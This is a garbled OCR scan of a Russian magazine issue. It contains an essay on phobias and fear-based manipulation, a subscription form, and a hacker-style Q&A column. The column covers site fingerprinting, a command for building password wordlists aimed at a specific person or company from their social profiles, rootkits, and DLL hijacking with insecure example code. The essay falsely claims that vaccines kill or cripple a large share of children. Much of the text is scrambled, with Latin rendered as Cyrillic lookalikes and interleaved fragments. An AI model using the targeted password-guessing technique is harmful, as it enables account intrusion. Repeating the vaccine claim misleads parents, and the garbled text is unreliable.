На мой взгляд, наиболее точной является классификация фобий по фабуле страха, которую 
предложил известный психиатр, медицинский психолог Карвасарский. 

Группа фобий, связанная с пространством. К ней относятся: 

• клаустрофобия — боязнь замкнутого пространства. Как правило, эта фобия имеет невро- 
тические корни в виде закрытых пространств при авариях или наказаниях в темных кладов- 
ках; 

• агорафобия — боязнь открытого пространства. Варианты агорафобии: страх путешество- 
вать без сопровождающих, страх находиться среди толпы незнакомых людей (хотя, в этом 
случае агорафобия парадоксально переплетается к клаустрофобией: с одной стороны, толпа 
и замкнутое пространство, с другой — никто из этих людей не знаком, поэтому невротиком 
воспринимается как эмоциональная пустота вокруг); похожие страхи, где есть шанс остаться 
без помощи, если вдруг станет плохо. Эта фобия особенно свойственна людям с приступами 
чего-либо: сердечные, потеря сознания, панические атаки, астма. 

• гипсофобия — страх ВЫСОТЫ; 

• батофобия — страх глубины. 

Группа танатофобии, или страх смерти. Причем часто человек боится не абстрактной смерти, 
а конкретной: умереть от определенной болезни, упасть на рельсы перед поездом метро, 
смерть оттерракта. К такой фобии склонны люди с высокой мнительностью, тревожные, 
зацикливающиеся, слишком много думающие. 

Группа нозофобий, или страх чем-то заболеть. 

Перечислять подвиды нозофобий можно бесконечно, так как сколько болезней, столько и 
фобий. Наиболее часто встречаются: сифилофобия, инсультофобия, инфарктофобия, канце- 
рофобия (боязнь заболеть раком], кардиофобия (страх сердечных заболеваний), бациллофо- 
бия (страх патогенных микроорганизмов). Сюда же относят страх вида крови — гематофо- 
бию. Особенно часто обострения нозофобий наступают во время различных эпидемий. 

Группа фобофобии, или страх испугаться чего-либо. Таким людям можно только посочувство- 
вать. 
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ІЛЧІТ5 



ФОБИИ, СВЯЗАННЫЕ 



С ЛЮДЬМИ И ОБЩЕСТВОМ 



Группа социофобий, или страхов, связанных с общественной жизнью. Для них при- 
сущ страх ситуаций, вызывающих унижение, смущение или страх оказаться в центре 
внимания, и наступают они именно среди людей или в общественных местах, даже 
если там людей мало. 

Например, к ним относится страх публичных выступлений; страх покраснеть (эрейто- 
фобия); страх познакомиться с человеком, особенно противоположного пола; страх 
потерять партнера; страх совершить какое-нибудь действие, которое может гипоте- 
тически вызвать смех — выйти в туалет, снять верхнюю одежду, есть в присутствии 
посторонних. Существует история о том, что один астролог умер от разрыва мочевого 
пузыря из-за того, что постеснялся выйти в туалет. Именно эту историю не про- 
веряла, но знаю, что такие люди действительно есть. И здесь важно не перепутать 
природное стеснение с фобией. Природные инстинкты — страх, голод, естественные 
потребности — при достижении слишком высокого уровня напряжения, особенно 
если оно на грани смерти, вышибают все комплексы. А вот человек, подверженный 
фобии, плевать хотел на неудовлетворенные природные инстинкты: невротическое 
напряжение для него более значимо, чем природное. 

В основе этой группы фобий лежит глубокая неуверенность в себе, своих силах, 
сильная зависимость от мнения окружающих, низкая самооценка. 

Группа сексуальных страхов. Самый распространенный вариант — это коитофобия 
(страх перед половым актом). 

Группа «контрастных» фобий. Когда человек, живущий на одних крайностях, боится 
выпасть в противоположные: например, женщина, свято хранящая верность мужу, 
посещающая церковь, в общем, благочестивая во всех смыслах этого слова, боится 
не удержаться перед какой-нибудь сексуальной оргией; или страх водителя школь- 
ного автобуса врезаться в какой-нибудь столб или бензовоз, что приведет к гибели 
детей. Другими словами, это навязчивый страх совершить то, что человек гипотети- 
чески может, но не хочет совершать. 




Гленофобия-одна из самых 
загадочных фобий: страх взгляда 
куклы 



«Вот был бы Сталин — он бы навел порядок...» 
А вот что пишут про Сталина исследователи: 
«В безграничной возможности подменятьдо- 
бро злом и наоборот проявлялась непостижи- 
мая загадочность Сталина. И потому лучшим 
выражением сталинского юмора был труп. Но 
не просто труп и нетруп врага, а труп друга, 
который любил Сталина, и которому все же 
Сталин почему-то доверял... Это проявлялось 
и в большой политике. Сталин убил Кирова, а 
затем, приписав это убийство своим идейным 
противникам, развязал цепь показательных 



ог 


юл 


ЬЗЕ 


СТРАХА 



Как и любая естественная эмоция, страх в разумном количестве несет в себе кон- 
структив: он предупреждаете потенциальной опасности, помогая быстрее мобили- 
зовать силы и вовремя среагировать на нее, дает встряску организму. Еще страх 
бывает желанным: вспомни, с каким упоением ты выискиваешь хорроры и триллеры 
в предвкушении порции адреналина. Да-да, именно в адреналине дело. Ведь зачем 
прыгать с парашютом, рискуя жизнью в реальности, если можно запланировано 
испугаться и получить ту же дозу бодрящего гормона? Адреналин = встряска = акти- 
визация внутренних ресурсов организма и психики. 

В психоанализе есть такое понятие — «комплекс кастрации»: мужчины, боясь быть 
кастрированными, все-таки играются с разными ножичками, опасными колюще- 
режущими предметами, а женщины, боясь быть изнасилованными, прячутся в темных 
углах. 

В фольклорной кладовой любого народа есть страшилки про привидений, русалок, 
покойников, ведьм и другую нечисть. Кто-то считает, что при помощи таких расска- 
зов у человека происходит катарсис — освобождение от своих собственных страхов 
и напряжений; кто-то — что не в состоянии объяснить невротизмы внутри сознания, 
человек ищет ответы во внешних обстоятельствах, а именно — в мистике; и, конечно 
же, надо вспомнить дедушку Фрейда, который давно открыл понятие танатоса — вле- 
чения к смерти, как одного из невротических инстинктов человека. Ужасающие исто- 
рии удовлетворяют этот инстинкт, не причиняя вреда самому организму. 



нику» дается выбор «бежать к охотнику или 
бежать в огонь». Удачность этого примера в 
том, что он четко описывает схему, по которой 
мы попадаемся в ловушку. Неудачность — в 
этом примере у оленя выбора нет, он повину- 
ется инстинкту самосохранения, незадумы- 
ваясь; его страх настоящий, природный. Аты 
— бот о за ріепз, человек мыслящий, именно 
поэтому твой страх редко бывает инстинктив- 
ным, в большинстве случаев он невротиче- 
ский (надуманный), как и у других слишком 
много думающих хомо сап пенсов. Для того, 
чтобы заманить тебя в ловушку, нужно всего 
лишь придумать и внушить тебе какой-нибудь 
страх. Посмотрим, как это делают некоторые 
категории власть имущих и манипуляторов. 

Правительство 

Не будем трогать наше действующее пра- 
вительство, ведь мы его любим и уважаем, 
лучше обратим взоры на дедушку Сталина, 
который считается одним из самых ярких 
диктаторов и тиранов на европейском про- 
странстве. Всю страну он держал в страхе и 
ужасе, и сточки зрения собственной выгоды 
делал абсолютно правильно: кому нужна 
демократия, когда выскочки постоянно 
норовят свергнуть действующего правителя 
с трона, заставляют жить в напряжении, идти 
на уступки... Причем, как ни прогибайся — 
все равно не угодишь. Ну кому это нужно? 
Намного эффективнее и полезнее держать 
всех в ежовых рукавицах: никаких попуска- 
тельств — это помогает дисциплинировать- 
ся; жестокое наказание за непродуманный 
поступок развивает патогенное прогностиче- 



ское мышление — человексто раз подумает, 
прежде чем что-то сказать или сделать; про- 
филактические расправы не допустят в умах 
граждан даже мысли о том, чтобы сойти с пути 
праведного; вынужденная любовь к правите- 
лю — это сродни продвинутой заповеди «воз- 
люби ближнего своего». Вполне благородные 
цели: народдуховно воспитывается, глава 
державы живет в спокойствии и гармонии. 

Что интересно — многие люди действительно 
любили Сталина, некоторые считали (и до сих 
пор считают) его политику справедливой и 
конструктивной, старички то и дело вздыхают: 



судебных процессов. Это был гениальный ход 
сталинской тактики и политики». 

Как видишь, чтобы войти в историю, нужно 
быть хоть немного гением; но для того, чтобы 
народ не создавал тебе проблем — достаточно 
хорошо запугивать его, пример можно брать с 
вышеописанного вождя, немного адаптиро- 
вав стратегию под наш век. Отличный пример 
— гибель и пропажа без вести журналистов и 
остальных неугодных. Кстати, причиной та- 
кому поведению правителей является тот же 
самый страх: страхутратить бразды правле- 
ния, страх за семью, страх потерять лицо... 
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^зЬиа НоНіпе - фотохудожник, создающий хоррор 



Кажется, я начинаю понимать, 
почему с детства не люблю 
клоунов :) 





Потомственная гадалка втретьем поколении: снимаю порчу, приворот, 
разворот, мордоворот, отворотповорот 



РР и реклама 

У этих манипуляторов нам учиться и учить- 
ся. Увидев в рекламном блоке ужасающие 
последствия кариеса, изжоги, колоний бакте- 
рий под ободком унитаза и тому подобное... ты 
еще не побежал за предлагаемым продуктом? 
Если нет — это значит, что тебе безразлично 
собственное здоровье. А вот большинству 
потребителей не все равно, и они, гонимые 
ужасом, бегут и покупаютжвачки, зубные па- 
сты и щетки, лекарства, средства гигиены, не 
проверяя, насколько действующим является 
спасительный эффект рекламируемого про- 
дукта. Вспоминаем оленя и подмену выбора: 
вместо «жевать или не жевать жвачку после 
еды» потребителю приходится выбирать 
между «жевать «Орбит» или «Дирол», или 
что-то еще». Но это относительно безобидные 
мелочи. Дело приобретает более серьезный 
оборот, когда речьзаходит, например, о 
вакцинации. Печальная статистика говорито 
том, что от прививокумирает или становится 
калеками очень большой процент детей. Но 
это говорит сухая статистика, а бигборды по- 
казывают нам печальные глаза ребенка с суб- 
титрами снизу или сверху от картинки: «Мама, 



подари мне жизнь...» Если бы не вчиталась, то 
подумала бы, что речь идет об абортах. Но нет 
— таким образом производитель вакцинации 
и его рекламная компания предлагает роди- 
телям выбор: «Подарить ребенку безоблачное 
и здоровое будущее или отдать на съедение 



кровожадной ветрянке». И плевать, что выбор 
полностью противоречит реальной стати- 
стике. Испуганные и впечатленные родители 
понесут младенца в частную поликлинику, 
чтобы «спасти ему жизнь», и возможно уже 
через пару дней поймут, как безжалостна и 
манипулятивна бывает реклама в погоне за 
прибылью. 

Похожие «фишки» используются и в поли- 
тике или бизнесе, когда кандидат подается 
в виде спасителя от какого-либо зла или 
угрозы. «Зло», кстати, предварительно 
придумывается, создается и внедряется 
в умы людей. Именно поэтому я называю 
наши страхи преимущественно невротиче- 
скими — прямой угрозы нет, она выдумана, 
мы спасаемся от несуществующей опас- 
ности, тратя на это абсолютно реальные 
средства. 



ПРОЕКЦИИ СТРАХА 



ПОВСЕДНЕВНОЙ ЖИЗНИ 



Есть страх, который существует в чистом виде — когда ты боишься и понимаешь, что 
боишься. Но есть эмоции и поведенческие реакции, которые являются результатом 
действия защитных механизмов психики, выталкивающих страх из зоны сознания. 
Вот несколько примеров. Стеснение — это предупреждающий страх проявить себя 
настоящего + страх негативной оценки окружающих в ответ на это проявление. 
Агрессия (как вариант] — это страх + защитный механизм отрицания — «Я не боюсь! 
И сейчас я докажу это, первым проявив инициативу». Стыд — страх потери идеаль- 
ного образа, созданного себе человеком. Презрение — содержит в себе долю страха 
стать таким же, как и объект презрения. 
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ІЛЧІТ5 




Это паук. Ачего вдетстве боялся 
ты? 



Госслужбы: страховщики, 
охранные службы, ГИБДД 

Думаю, многие из нас сталкивались с со- 
трудниками страховых компаний. Нетолько 
тех, которые в обязательном порядке страхуют 
твой автомобиль, но и тех, которые должны 
впарить свои услуги, в итоге получив за это 
деньги (естественно, изтвоего кармана]. Ко- 
нечно же, ты не хочешь отдавать крупную сум- 
му за воздух, поэтому с их стороны в ход идут 
страшные сказки: как люди гибнут на ровном 
месте; как человекушел на работу, приходит 
— а квартира его взломана и ограблена; как 
один мужчина купил новенький Бентли, лег 
спать, а на следующее утро его украли... Да, 
иногда эти сказки носятабсурдный харак- 
тер — здесь играет роль интеллектуальная 
продвинутость агента, рассказывающего 
страшилки. Волей-неволей начинаешьзаду- 
мываться: а вдруг и я могу стать жертвой, ведь 
по сути никто из нас не застрахован... И тут: 
оппа! «Вы еще не застрахованы?! Мы пред- 
лагаем застраховать Вас от падения самолета 
на голову!». 

Я вспоминаю, как меня запугивал страховой 
агент при покупке обычного полиса граж- 
данской ответственности: «А Вы знаете, что 
если Вы врежетесь в дорогую машину, то 
сумма обычного полиса не покроетубытки, 
там одну царапину на двери закрасить — не 
меньше 500 долларов США. А если это будет 
не царапина, а вмятина? Один мой знакомый 
как-то раз влетел в черный джип, его стра- 
ховки не хватило — и хозяин джипа угрожал 
ему расправой! Оно Вам надо? Может лучше 
доплатить лишние 30 у.е. и ездить спокойно?» 
И я доплатила. Потому что «А вдруг...?». 

Что ни говори, страховики хорошо умеют 
обрисовывать ужасающие перспективы су- 
ществования без страховки. Как будто сумма, 
выплаченная родственникам после смерти 
застрахованного, вернет ему жизнь... 

А вспомни свои ощущения при ожидании 
ГИБДД’шника, медленно, уверенно и само- 
довольно идущего ктвоей машине: такудав 
приближается к кролику. Вроде ничего 
серьезного или вообще не нарушал, но, судя 
по его виду, штрафтебе сейчас впаяютчуть ли 
не до лишения прав, или вообще конфискуют 
автомобиль и дадут пожизненное заключе- 



ние. Да, у страха глаза велики, и ты непро- 
извольно вкладываешь в права крупную 
купюру, уверяя себя, что она ничего не стоит 
по сравнению ствоей безопасностью. Как 
видишь, опять надуманная опасность и 
реальный финансовый отстег. 

По такой же «схеме» работают патрульные 
наряды милиции, охранные службы и даже 
инспектора в налоговой. 

Маги, целители, колдуны 

Обладают ли даром исцеления и сотворения 
чудес потомственные маги, целители и кол- 
дуны в третьем поколении — вопрос спорный, 
ното, что они обладают даром запудривания 
мозгов и устрашения верящих в чудеса лю- 
дей — это понятно любому здравомыслящему 
человеку. Создавая таинственную мишуру 
вокруг себя, они заставляют посетителей по- 
верить в то, что они избранные, знают что-то, 
чего не знают все остальные, могут навести 
порчу и наоборот — спасти от нее. Создает- 
ся образ могущественного, всезнающего, 
всеумеющего полубога-полудьявола. В одном 
помещении, где принимают«потомственные 
в третьем поколении», находятся и иконы, и 
кресты, и карты Таро, и ящерицы в бутылоч- 
ках, и чьи-то черепа и кости, и какие-то древ- 
ние свитки подозрительного вида, и право- 
славные свечи, что в целом дает неплохой 
замесдля влияния на психику доверчивых 
граждан. Для тех, у кого клиенты атеистичны 
и не особо доверчивы, создали специаль- 
ную Профессиональную Ассоциацию магов, 
специалистов парапсихологии и целителей. 
Схема работы такого «специалиста», как пра- 
вило, стандартна, хоть и возможны незначи- 
тельные вариации: «У тебя проблема? Таааа к, 
давай посмотрим (какой-нибудь фокус с помо- 
щью колдовского инвентаря]. Ооой... Порча у 
тебя, милый, все проблемы вжизни из-за нее. 
И это еще не все — тебе за упокой поставлено, 
и совсем скоро начнется действие. Что делать 
будем? Ты знаешь, что порча снимается 
только через деньги? Да, да, ты разве не знал? 
Через деньги ставится, через деньги и сни- 
мать надо, милый. Я себе ни копейки не беру! 

Я помогаю людям с божьей помощью, поэтому 
мне деньги не нужны, мне бог подает все, что 
мне нужно...». Страх за свою жизнь и благопо- 
лучие затмевает рассудок (хотя, если человек 
пошел ктакому колдуну, рассудокуже был 
не особо светлым), и клиент бежит за ни мать 
деньги или вскрывать заначку, чтобы спасти 
себежизнь с помощью «потомственного». 
Опять, как видишь, страх не настоящий, а 
внушенный. 

Таблетка от страха 

Если ты прочитал все, что написано выше, 
то уже знаешь, откуда растут корни страха, 
кем он внушается, как выглядит, какие имеет 
признаки. В общем, этого достаточно, чтобы 
избавиться от многих страхов, которыетебе 
присущи, но для полного счастья дам еще не- 
сколько практических советов: 




Если при их виде похолодело 
и сжалось внутри, значит, у тебя 
естьавтомобиль 



1. Неубегай отсвоего страха, все равно не 
убежишь. Лучше стань и гордо посмотри ему 
в глаза, — даже этого иногда достаточно, 
чтобы он исчез. Если ты боишься подходить 
на улице к девушкам, сделай своему страху 
назло — подойди и познакомься. В худшем 
случае получишь отказ, но при этом жизнь 
продолжится — уже без страха, и это уже 
важнее, чем одно неудавшееся знакомство. В 
лучшем случае... вариантов много. Но, апуѵѵау 

— лучше размышлять о позитивном исходе, 
чем зацикливаться на чем-то плохом. 

2 . При размышлениях о преследующем 
страхе задай себе вопрос: «Что самое худшее 
может случиться, если ЭТО произойдет?». И 
спрогнозируй несколько вариантов развития 
ситуации и своего поведения в ней. Напри- 
мер: «Если меня уволят, я останусь без денег, 
но при этом чуть позже: найду новую работу с 
более приятным начальником; пересмотрю 
свое отношение к наемномутруду, и воз- 
можно, займусь своим бизнесом; наконец 
отдохну» и тому подобное. 

3. Не бойся неизвестности. Рано бояться того, 
что еще не произошло — это не только портит 
нервы, ной может привлечь в твою жизнь то, 
чего ты опасаешься. Не потому что «чудеса», 
а потому что зацикливаешься и начинаешь 
замечать предметопасений и тяготеть к нему. 
Умныелюди говорят: решай проблемы по мере 
их поступления. Мудрые считают, что лучше 
спрогнозировать и предотвратить проблему. И 
только глупые ничего не делают и боятся. 

4 . Анализируй корни своих страхов и устраняй 
их. Пока причина не осознается, страх носит 
панический характер, но кактолькоты пой- 
мешь, откуда тревога и негативные ощущения 

— ты сразу же можешь предпринять что-либо 
для ликвидации опасных обстоятельств. 

5 . Помни о том, что страх — это всего лишь 
эмоция, а все эмоции субъективны, то есть 
надуманны. Он существует ровно до тех пор, 
покатыонемпомнишь. В реальности у тебя 
есть выбор: бояться или не бояться. Надеюсь, 
этот выбор будет правильным :]. ц-ц 
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^^ВЫГОДА*ГАРАНТИЯ*СЕРВИС 

БУДЬ" УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 

СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 




Замучилися искать журнал в палатках и мага 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьером из рук в руки 
в течение трех рабочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 



Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
р | ѵѵі из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200-3-999 
(для жителей других регионов России, абонентов 
сетей МТС, БиЛайн и Мегафон). 




ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС іпГоІсРфс.ги 



ЭТО ЛЕГКО! 

1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 

вЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬ5СгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва. 

ул. Тимура Фрунзе, д. 11, стр. 44. 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
календарный месяц после оплаты. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 

СТОИМОСТЬ ЗАКАЗА: 

2100 РУБ. ЗА 12 МЕСЯЦЕВ 
1200 РУБ. ЗА 6 МЕСЯЦЕВ 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
по Москве в пределах МКАД 



ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


□ на 6 месяцев 
| | на 12 месяцев 
начиная с 


20 г. 


^ прошу выслать бесплатный 
номер журнала 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 



ІЛЧІТ5 



Антон «апі» Жуков 




О: Подскажи, как можно определить движок 
сайта, если админ убрал все баннеры, по кото- 
рым можно было определить СМ5. 

А: Действительно, определить движоксайта на 
глаз не всегда представляется возможным, и без 
использования специальных инструменте в тут 
никак не обойтись. Ксчастьютаковые имеют- 
ся. Одним из лучших является ѴѴЬаГ/ѵеЬ [ ѵѵѵѵѵѵ. 
тогпіпдзІагзесигіІѵ.сопп/гезеагсЬ/ѵѵЬаІѵѵеЬ ] 

— веб-сканер нового поколения, умеющий 
идентифицировать системы управления кон- 
тентом (СМ5), платформы для блогов, ^ѵа5сгірІ- 
библиотеки, сервера и т.д. В процессе того, как 
ты посещаешь какой-либо вебсайт, браузер 
получаетмассу невидимой информации отом, 
как настроен веб-сервер, с помощью какого ПО 
создавалась страничка ит.д. На данный момент 
программа поддерживает250 плагинов, иденти- 
фицирующихСМО по различным признакам. На- 
пример, даже если админ удалил тэгѴѴогсІРгезз, 
это не собьет сканер столку, так как плагин для 
ѴѴогсІРгезз будет искать еще строку «ѵѵр-сопіепі». 
Использовать сканер очень просто, достаточно 
передать ему в качестве параметра адрес сайта: 

$ . /ѵтЬаСѵтеЬ тт. 

тогпіпдзСагзесигіСу . сот 



О: Подскажи простой способ сгенерировать сло- 
варь для подбора пароля каккаунту конкретного 
человека. 

А: Пентестеры и хакеры сталкиваются с этой 
задачей практически каждый день. Поэтомууже 
давно существуютспециальные инструменты, 
которыеумеют генерировать списки паролей, 
принимая в качестве параметра только ИВ І_. 
Например, такой инструмент, какСеѴѴ1_ [ ѵѵѵѵѵѵ. 
сІідіпіпіа.огд/рго]есІ5/сеѵѵ[.р[ір ]. умеет генериро- 
вать словари, путешествуя по заданному сайту 
до указанной глубины. Однако хакеры — люди 
ленивые :), и привыкли по максимуму автома- 
тизировать свою работу. ІІзегразз.ру [ ѵѵѵѵѵѵ. 
раиісіоісот.сопп/изегразз.рѵ ] — небольшой 
скриптик на РуіЬоп, который с помощью боодіе 
ищет человека на Ыпкесііп.сот . а затем натрав- 
ливает на найденный профиль СеѴѴІ_. Если жер- 
тва указала в профиле свои аккаунты ІасеЬоок, 
тузрасе ит.д.до данныедля создания словаря 
берутся и оттуда. Работа со скриптом проста: 

$ руСНюп изегразз.ру "пате" . 

Параметр пате может быть как именем отде- 
льного человека, так и названием компании 
(в данном случае будетегенерирован словарь 



для всех работников данной компании ]. У про- 
граммы есть несколько интересных опций: 

• д — отвечаетза количество страниц, ссылки 
на которые надо отпарсить после выполнения 
поискового запроса Гугл; 

• з — с помощью этой опции задаются допол- 
нительные параметры для поиска (например, 
если компания/человекзанимается безопас- 
ностью, то можно задать «зеси гМ:у») ; 

• т — задает минимальную длину слов, пере- 
дающихся СеѴѴІ_. 

Как видишь, все очень просто. Вдобавок, 
можно заточить скриптик под свои собствен- 
ные нужды. 

О: Есть л и руткиты длях64? 

А: Еще некоторое время назадя был бы не 
уверен. Нотеперьточно могу сказать: «Да». 
Сейчас совершенно очевидно, что нашумев- 
ший руткитТОЕЗ, который надолго поселился 
в головах исследователей из антивирусных 
компаний, развивается именно в этом направ- 
лении. Напомню, что ЮЕЗ считается одним из 
самых передовых руткитов на сегодняшний 
день (подробнее можно прочитать в этой статье 
— ѵѵѵѵѵѵ. поЬипкит.ги/іззиеООЗЛсІзз-ЬоІпеі ]. 
Однако количество установок новой ѴѴі п 7 х64 
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постоянно растет, а руткитдо этого момента 
до сих пор не умел осваиваться в системе. Это 
странно, потому что механизмы, позволяющие 
инсталлировать на эту платформу, существуют. 
Тотже концепт (БізаЫе РаІсЬОиагсІ & Бгіѵег 
зідпаіиге епіюгсетепі:) механизма обхода про- 
верки подписи в х64 появился еще в начале 
года в публичном доступе. Авторы нового ТБІ_4 
используют техники заражения МБР и старта 
вредоносного кода раньше самой операци- 
онной системы. Подобные методологии уже 
активно применялисьтакой малварью, как 
МеЬгооЕ Такчто, вероятно, в ближайшее время 
х64уже перестанет быть помехой. 

О: Объясни на пальцах, что за новые атаки — 
□□.-инъекции? 

А: Есть несколько разновидностей этой атаки. 
Самые распространенные — атаки на основе 
функции І_оасЛ_іЬгагу. Когда приложение 
динамически загружает библиотеку ОН без 
указания полного пути, система ѴѴіпсІоѵѵз 
пытается найти ее путем линейного поиска в 
определенном наборе каталогов (так называе- 
мый порядок поиска БІ_І_). Если библиотеку 
удается обнаружить в по рядке поиска ОН, она 
загружается. Однако если ее не удается найти 
ни в одном из каталогов порядка поиска ОН, 
система ѴѴіпсІоѵѵз сообщаето сбое загрузки 
БІ_І_. Нижеуказан порядок поиска БІ_І_ для фун- 
кций динамической загрузки БІ_Б БоасіиЬгагу 
и БоасіиЬгагуЕх. 

• Каталог, из которого загружено приложение. 

• Системный каталог. 

• Каталог 16-разрядной версии системы. 

• КаталогѴѴіпсІоѵѵз. 

• Текущий рабочий каталог. 

• Каталоги, указанные в переменной среды 
РАТН. 

Рассмотрим описанную ниже ситуацию. 

• Приложение загружает библиотеку Б И_, ко- 
торая предположительно находится в текущем 
рабочем каталоге приложения, без указания 
полного пути. 

• Приложение подготовлено для обработки 
ситуаций, когда найти библиотеку не удастся. 

• Злоумышленникзнаетоб этом и контроли- 
руеттекущий рабочий каталог приложения. 

• Он копируетсобственную специально со- 
зданную версию библиотеки втекущий рабо- 
чий каталог. Предполагается, что у злоумыш- 
ленника есть соответствующее разрешение. 

• Система ѴѴіпсІоѵѵз выполняет поиск биб- 
лиотеки в соответствии с порядком поиска 

О IX и обнаруживает нужный файл в текущем 
рабочем каталоге приложения. В этом сцена- 
рии специально созданная библиотека ОН 
запускается в приложении и получает права 
текущего пользователя. Для предотвращения 
описанной атаки можно удалить текущий ра- 
бочий каталог приложения из порядка поиска 
ОН. Для этого нужно вызвать функцию АРІ 
ЗеіБИБігесІюгу с пустой строкой (""). Если при- 
ложение зависит от загрузки библиотеки ОН 
из текущего каталога, определите его располо- 
жение и используйте с функцией БоасіиЬгагу 




Перводим контроллер флешки в режим ИОО 



полный путь. Известно, что некоторые раз- 
работчики используют функцию І_оасИ_іЬгагу 
для проверки наличия отдельных ОБЕ с целью 
определения текущей версии ѴѴіпсІоѵѵз. Следу- 
ет помнить, что это может сделать приложение 
уязвимым. Если соответствующая библио- 
тека в действительности отсутствует в среде 
ѴѴіпсІоѵѵз, в которой выполняется приложение, 
злоумышленник может поместить в текущий 
рабочий каталог библиотеку с та ким же име- 
нем. Если приложение загружает подключа- 
емые модули сторонних компаний и не может 
использовать полный путь к ним при вызовах 
функции І_оасИ_іЬгагу, следует удалить текущий 
рабочий каталог из порядка поиска БІ_І_ с 
помощью функции ЗеЮІЮі гесЕогуС'"] , а затем 
добавить в порядок поиска каталог установки 
подключаемого модуля с помощью функции 
5еІБ ІЮ і гесЕогуі" катал ог_у ста новки_модуля"). 

О: А можешь дать примеры небезопасной за- 
грузки библиотек в исходном коде? 

А: В примере кода ниже приложение выполня- 
ет поискбиблиотеки «зсЬаппеЕсШ.», исполь- 
зуя наименее безопасный путь поиска. Если 
злоумышленник поместит библиотеку с таким 
именем втекущий рабочий каталог, она будет 
загружена еще до того, как приложение выпол- 
нит поиск нужного файла в каталогах ѴѴіпсІоѵѵз. 

ШОКБ геСѵаІ = ЗеагсЬРа^Ь. (ШіЛ 

" зсііаппеі " , " . сЗ.11 " , егг, гезиШ, 

ШЬЬ) ; 

НМОБЦЪЕ Ъапсііе = 

ЬоайЬіЬгагу (гезиШ) ; 

В примере кода ниже приложение пытается 
загрузить библиотеку из разных расположе- 
ний приложения и операционной системы, 
описанных в начале данного документа, 
с помощью функции І_оасИ_іЬгагу(]. Если 
нужный файл отсутствует, приложение может 



попытаться загрузить его из текущего рабо- 
чего каталога. В этом примере уровень риска 
немного ниже, чем в предыдущем. 

НМОБІІЬЕ Ъапсііе = 

ЬоайЬіЬгагу ( " зсЬаппеІ . сИГ); 

О: А есть ли тулзы, позволяющие отыскать 
вызовы небезопасных функций загрузки 
библиотек? 

А: Мама-МісгозоіТ зарелизила приложение 
Ргосезз МопТог, которое позволяет разра- 
ботчикам и администраторам тщательно 
отслеживать поведение выполняемого 
процесса. С помощью средства Ргосезз 
Мопііог [ ЬирѴЛесЬпеЕтісгозо^.сот/еп-из/ 
зѵзіп1:егпаІ5/ЬЬ896645.а5рх ] можнодинами- 
чески определять, уязвимы ли приложения 
для описанных атак. Попробуй запустить 
приложение, используя определенный ката- 
лог в качестве текущего рабочего. Напри- 
мер, дважды щелкни файл с расширением, 
обработчик которого назначен данному 
приложению. 

Далее необходимо настроить фильтры средс- 
тва Ргосезз Мопііог — задай все, какпоказано 
на скриншоте. Факт использования уязвимого 
сразу пути будет отображен программой. 
Ктомуже разработчик Меіазріоіі раз- 
работал на Рыбу довольно простую ути- 
литу Б ПН ііаскАисІМ:Кі1: ц/Д .[у/ 

Б1_1_НііаскАис1ііКі1: ) для автоматизированного 
поиска уязвимых приложений. Запускается он 
следующим образом: 

• распаковываем архив БІ_І_Ні]‘аскАисІііКіІ; 

• копируем в эту же директорию ргостоп.ехе 
(это бинарник Ргосезз Мопііог); 

• устанавливаем интерпретатор Рыбу ( гиЬѵ- 
Іапд.огд ). 

Далее через «Пуск» выбираем «Зіагі: 

СоттапсІ РготрІѵѵііН Рыбу», переходим 
в директорию БЕБНуаскАисИЖН:. Теперь 
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Фильтры РгосМоп'а для поиска ОІ_І_ I піесѣіоп 



запускаем «аисІіІ.ЬаІ» и готовимся закрыть 
множество всплывающих окон! Послетого, как 
программа сделает все итерации, необходимо 
будет экспортировать С5Ѵ-лог из РгосМоп'а. 
После этого остается проверить полученные 
результаты с помощью специального скрипта. 
Для этого переходим в директорию ОИТезІ и 
